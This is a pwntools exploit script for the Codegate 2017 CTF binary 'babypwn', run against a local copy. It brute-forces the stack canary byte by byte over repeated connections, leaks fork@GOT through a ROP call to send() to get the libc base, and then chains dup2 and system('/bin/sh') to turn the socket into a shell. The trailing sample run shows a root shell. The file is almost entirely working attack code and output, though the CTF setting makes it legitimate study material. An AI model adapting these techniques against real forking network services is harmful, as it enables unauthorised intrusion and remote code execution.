from pwn import *
import sys

# Exploit script for the CTF binary "./babypwn" (Codegate 2017), run against a
# copy listening on localhost. The log captured in the trailing string shows the
# target's protections: i386, NX enabled, stack canary, Partial RELRO, no PIE,
# which is what the three stages below rely on:
#   1. recover the 4-byte stack canary one byte at a time over repeated
#      connections (only viable because the canary does not change between
#      connections -- presumably a forking service whose children inherit the
#      parent's canary; re-exec'ing per connection or re-randomising the canary
#      after fork() would defeat this stage),
#   2. leak fork@GOT through a ROP call to send() to derive the libc base
#      (possible because the binary is not PIE, so elf.sym/elf.got are fixed),
#   3. ROP into libc to redirect the socket onto stdin/stdout and run /bin/sh.
# Written for Python 2 pwntools: payloads are str, not bytes, and the
# generator is consumed with .next().

HOST = '127.0.0.1'
PORT = 8181

context(os = "linux", arch = "i386")
#context.log_level = 'DEBUG'

elf = ELF("./babypwn")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")


def screen_clean():
    """Erase the previous terminal line (cursor up + clear line).

    Used purely for cosmetics: pwntools prints an "Opening connection" line per
    remote(), and the brute-force loop would otherwise flood the terminal.
    """
    sys.stdout.write("\033[F")
    sys.stdout.write("\033[K")


def canary_bruteforce(offset):
    """Recover the 4-byte stack canary byte by byte.

    offset: number of filler bytes between the start of the message buffer and
            the canary (40 for this binary, see canary_offset below).
    Returns the canary as an unsigned 32-bit int (u32 of the 4 recovered bytes).

    Each attempt overwrites exactly one more byte of the canary. If the guess is
    wrong the process aborts and the connection hits EOF (caught below); if the
    connection survives r.recv() the byte is kept. Note that the inner loop is
    bounded by 0xff, and that each failed guess costs one fresh connection, so
    the stage is noisy: a defender watching the service would see a burst of
    short-lived connections ending in stack-smashing aborts.
    """
    junk = "A" * offset
    canary_value = ""
    while len(canary_value) < 4:
        word = 0x00
        while word < 0xff:
            try:
                r = remote(HOST, PORT)
                screen_clean()
                # message = filler + bytes already known + current guess
                payload = ""
                payload += junk
                payload += canary_value
                payload += chr(word)
                r.sendlineafter("> ", "2")
                r.sendafter("Message : ", payload)
                r.sendlineafter("> ", "3")
                # A successful recv() means the canary check passed -> byte is correct.
                r.recv()
                log.success("Byte found: " + hex(word))
                canary_value += chr(word)
                r.close()
                screen_clean()
                break
            except EOFError as error:
                # Wrong byte: the process died on the canary check; try the next value.
                word += 1
                r.close()
                screen_clean()
    return u32(canary_value)


log.info("Deploying stage 1: Canary bruteforce")
canary_offset = 40
canary_value = canary_bruteforce(canary_offset)
log.success("Canary value: " + hex(canary_value))

log.info("Deploying stage 2: Leak base libc address")
# ROP chain: filler | canary | 0xc bytes of saved-register padding | send(...)
# Call layout after the return address: fake return ("AAAA"), then the
# arguments sockfd=0x4, buf=fork@GOT, len=0x4, flags=0x0, i.e.
# send(4, &GOT[fork], 4, 0) writes the resolved libc address of fork() back to
# the client socket. fd 4 being the client socket is an assumption baked into
# the chain (it is also used by dup2 in stage 3) -- confirm against the binary.
leak = flat(
    "A" * canary_offset,
    canary_value,
    "B" * 0xc,
    elf.sym['send'],
    "AAAA",
    0x4,
    elf.got['fork'],
    0x4,
    0x0,
    endianness = 'little', word_size = 32, sign = False)
r = remote(HOST, PORT)
screen_clean()
r.sendlineafter("> ", "2")
r.sendafter("Message : ", leak)
r.sendlineafter("> ", "3")
# The 4 bytes sent back are the little-endian address of fork() in libc.
fork_leak = u32(r.recv(4))
log.success("Leaked fork@@GLIBC address: " + hex(fork_leak))
r.close()
screen_clean()

# Rebase the libc ELF object so libc.sym / libc.search yield runtime addresses.
# This assumes the remote libc is the same build as /lib/i386-linux-gnu/libc.so.6
# loaded above (true for a local run; offsets differ across libc builds).
libc.address = fork_leak - libc.sym['fork']
log.success("Base libc address: " + hex(libc.address))
log.success("Dup2@@GLIBC address: " + hex(libc.sym['dup2']))
log.success("System@@GLIBC address: " + hex(libc.sym['system']))
log.success("/bin/sh address: " + hex(libc.search('/bin/sh').next()))

log.info("Deploying stage 3: Shell spawn")
# ROP chain: dup2(4, 0); dup2(4, 1); system("/bin/sh"); exit().
# The pop-pop-ret gadget after each dup2 discards that call's two arguments so
# the next call frame lines up. exit() is placed as system()'s return address
# so the process terminates cleanly when the shell exits.
shell = flat(
    "A" * canary_offset,
    canary_value,
    "B" * 0xc,
    libc.sym['dup2'],
    0x08048b84, # pop edi ; pop ebp ; ret (Cleaning the stack)
    0x4,
    0x0,
    libc.sym['dup2'],
    0x08048b84, # pop edi ; pop ebp ; ret (Cleaning the stack)
    0x4,
    0x1,
    libc.sym['system'],
    libc.sym['exit'],
    libc.search('/bin/sh').next(),
    endianness = 'little', word_size = 32, sign = False)
r = remote(HOST, PORT)
screen_clean()
r.sendlineafter("> ", "2")
r.sendafter("Message : ", shell)
r.sendlineafter("> ", "3")
r.interactive()
r.close()
screen_clean()

# Sample run, kept by the author as a record of the expected output.
''' kaorz@kali:~/Exp/babypwn_codegate_2017# python exploit.py [*] '/root/Desktop/Exp/Exp/babypwn_codegate_2017/babypwn' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) [*] '/lib/i386-linux-gnu/libc.so.6' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] Deploying stage 1: Canary bruteforce [+] Byte found: 0x0 [+] Byte found: 0xd0 [+] Byte found: 0xc9 [+] Byte found: 0xb0 [+] Canary value: 0xb0c9d000 [*] Deploying stage 2: Leak base libc address [+] Leaked fork@@GLIBC address: 0xf7dcb190 [+] Base libc address: 0xf7d0d000 [+] Dup2@@GLIBC address: 0xf7df32a0 [+] System@@GLIBC address: 0xf7d49d10 [+] /bin/sh address: 0xf7e88988 [*] Deploying stage 3: Shell spawn [*] Switching to interactive mode $ id uid=0(root) gid=0(root) grupos=0(root) '''